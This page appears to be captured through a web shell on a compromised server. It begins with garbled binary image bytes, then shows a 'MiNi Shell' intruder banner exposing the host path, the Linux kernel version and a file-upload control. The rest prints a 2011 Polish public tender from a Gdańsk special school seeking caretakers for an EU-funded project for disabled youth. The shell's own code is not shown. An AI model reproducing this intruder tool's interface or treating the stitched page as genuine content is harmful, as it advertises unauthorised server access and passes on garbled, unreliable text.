JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110120/9926-N-2011.html

<p class="kh_header"><b>Gdańsk: NA WYBÓR KADRY dla REALIZACJI ZADAŃ PROJEKTOWYCH KAPITAŁ JEST W NAS 
współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 realizowany z priorytetu VII. Promocja Integracji Społecznej Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnieniu sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 9926 - 2011; data zamieszczenia: 20.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Specjalnych Nr 2 , ul. Wita Stwosza 23, 80-312 Gdańsk, woj. pomorskie, tel. 058 5520994, faks 58 5520994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zssp2gdansk.webpark.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA WYBÓR KADRY dla REALIZACJI ZADAŃ PROJEKTOWYCH KAPITAŁ JEST W NAS 
współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 realizowany z priorytetu VII. Promocja Integracji Społecznej Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnieniu sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest WYBÓR KADRY dla REALIZACJI ZADAŃ PROJEKTOWYCH KAPITAŁ JEST W NAS
polegających na świadczeniu obowiązków dla osób niepełnosprawnych:
część 1 - Opiekuna nr 1 do ON ruchowo na wózkach na zajęcia kulturalne
część 2 - Opiekuna nr 2 do ON ruchowo na wózkach na zajęcia kulturalne;
część 3 - Opiekuna do zajęć z nordic walking;
część 4 - Opiekuna nr 1 do ON I klasy SSPdP na zajęcia kulturalne;
część 5 - Opiekuna nr 2 do ON I klasy SSPdP na zajęcia kulturalne;
część 6 - Opiekuna nr 1 do ON II klas SSPdP na zajęcia kulturalne;
część 7 - Opiekuna nr 2 do ON II klas SSPdP na zajęcia kulturalne;
część 8 - Opiekuna stażu nr 1 u pracodawcy do ON III klas SSPdP;
część 9 - Opiekuna stażu nr 2 u pracodawcy do ON III klas SSPdP;
część 10 - Opiekuna nr 1 do ON III klas SSPdP na zajęcia kulturalne;
część 11 - Opiekuna nr 2 do ON III klas SSPdP na zajęcia kulturalne;
część 12 - Opiekuna ON nr 1 na wyjazd szkoleniowy z warsztatów zawodowych;
część 13 - Opiekuna ON nr 2 na wyjazd szkoleniowy z warsztatów zawodowych;
część 14 - Opiekuna do opieki nad dziećmi - podczas zajęć z rodzicami;
w projekcie Kapitał jest w nas współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 realizowany z priorytetu VII. Promocja Integracji Społecznej Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnieniu sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym



Informacja o projekcie:
Cel projektu: celem ogólnym projektu jest objęcie wsparciem 43 osób niepełnosprawnych intelektualnie w tym 23K i 20M oraz ich otoczenia - 24 Matek osób niepełnosprawnych z terenu województwa pomorskiego poprzez cykl dodatkowych warsztatów i staży dla zwiększenia ich aktywności społecznej i zawodowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 1:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 1 do ON ruchowo na wózkach na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 2:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 2 do ON ruchowo na wózkach na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 3:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna do zajęć z nordic walking posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki, kurs udzielania pierwszej pomocy przedmedycznej oraz doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 4:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 1 do ON I klasy SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 5:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 2 do ON I klasy SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 6:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 1 do ON II klas SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;

W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 7:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 2 do ON II klas SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 8:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna stażu nr 1 u pracodawcy do ON III klas SSPdP posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i staży u pracodawcy z udziałem osób niepełnosprawnych, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 9:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna stażu nr 2 u pracodawcy do ON III klas SSPdP posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i staży u pracodawcy z udziałem osób niepełnosprawnych, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 10:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 1 do ON III klas SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 11:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna nr 2 do ON III klas SSPdP na zajęcia kulturalne posiadającą wykształcenie wyższe pedagogiczne, w kierunku oligofrenopedagogiki oraz doświadczenie w organizacji wyjść i wycieczek z udziałem niepełnosprawnej młodzieży, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 12:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna ON nr 1 na wyjazd szkoleniowy z warsztatów zawodowych posiadającą
wykształcenie wyższe pedagogiczne, kurs kierowników wycieczek oraz doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 13:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna ON nr 2 na wyjazd szkoleniowy z warsztatów zawodowych posiadającą
wykształcenie wyższe pedagogiczne, kurs kierowników wycieczek oraz doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi;
W PRZYPADKU SKŁADANIA OFERTY NA CZĘŚĆ 14:
wymagane jest dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, na stanowisku Opiekuna do opieki nad dziećmi - podczas zajęć z rodzicami posiadającą wykształcenie pedagogiczne, opiekun medyczny, Policealne Studium Zdrowia i Terapii, doświadczenie zawodowe w zakresie współpracy z osobami niepełnosprawnymi, znajomość specyfiki współpracy z osobami niepełnosprawnymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INNE, NIEZBĘDNE DOKUMENTY, KTÓRE WYKONAWCA UBIEGAJĄCY SIĘ O ZAMÓWIENIE PUBLICZNE ZOBOWIĄZANY JEST ZŁOŻYĆ: 1) Formularz OFERTA, wg wzoru zamawiającego, o treści odpowiadającej Załącznikowi nr 1 do siwz. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wykonawcy składają jeden formularz OFERTA. 2) Pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia. 3) Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany dokument musi być złożony przez każdego wykonawcę. 4) Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych, według wzoru, stanowiącego załącznik nr 2 do siwz. 5) Pisemne zobowiązanie podmiotów oddających do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków o treści odpowiadającej załącznikowi nr 4a do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy wymaga zgody obu stron wyrażonej na piśmie pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy, a w szczególności w zakresie:
a)	wszelkich zmian umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa,
b)	wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej  lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości,
c)	zmian teleadresowych stron umowy, przy czym w razie zmian zapisanych wyłącznie w preambule umowy, nowe dane teleadresowe mogą być pisemnie notyfikowane przez stronę, której one dotyczą, w odrębnym oświadczeniu, pisemnie tylko poświadczonym przez drugą stronę.
3.	Zmiana umowy dokonana z naruszeniem zapisów ust. 1 i 2 jest nieważna.
4.	Niedopuszczalne jest wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
5.	Żadna zmiana nie może odnosić się do zdarzeń uprzednio dokonanych, a skuteczność zmiany nie ma mocy wstecznej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zssp2gdansk.webpark.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego w Sekretariacie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2011 godzina 10:00, miejsce: siedziba Zamawiającego Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Kapitał jest w nas współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 realizowany z priorytetu VII. Promocja Integracji Społecznej Działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnieniu sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym 

TERMIN WYKONANIA ZAMÓWIENIA
od dnia podpisania umowy do grudnia 2012 r. z wyłączeniem lipca i sierpnia 2011 . oraz z wyłączeniem lipca i sierpnia 2012 r.
W przypadku wyjazdów szkoleniowych z warsztatów zawodowych termin może ulec przesunięciu na początek lipca, z uwagi na termin zakończenia roku szkolnego.

Wykonawca może złożyć ofertę na 1 część zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opiekun nr 1 do ON ruchowo na wózkach na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---	opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć.
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opiekun nr 2 do ON ruchowo na wózkach na zajęcia kulturalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu wyjścia w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas wyjścia;
---opracowanie ankiety badającej zadowolenie uczestników wyjścia, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 70 godzin.
Od lutego 2011 do grudnia 2011 - 6 wyjść po 5 godz.
Od stycznia 2012 do listopada 2012 - 8 wyjść po 5 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opiekun do zajęć z nordic walking;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> do głównych obowiązków opiekuna należeć będzie, w szczególności:
---opracowanie programu opieki w uzgodnieniu z rodzicami młodzieży;
---sprawowanie opieki nad młodzieżą podczas zajęć;
---opracowanie ankiety badającej zadowolenie uczestników zajęć, przeprowadzenie jej i oddanie specjaliście ds. ewaluacji i monitoringu
---sporządzenie notatki z przebiegu zajęć. 
Przewidywana liczba godzin świadczenia obowiązków opiekuna wynosi 52 godzin.
Od lutego 2011 do grudnia 2011 - 32 godz.
Od stycznia 2012 do listopada 2012 - 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
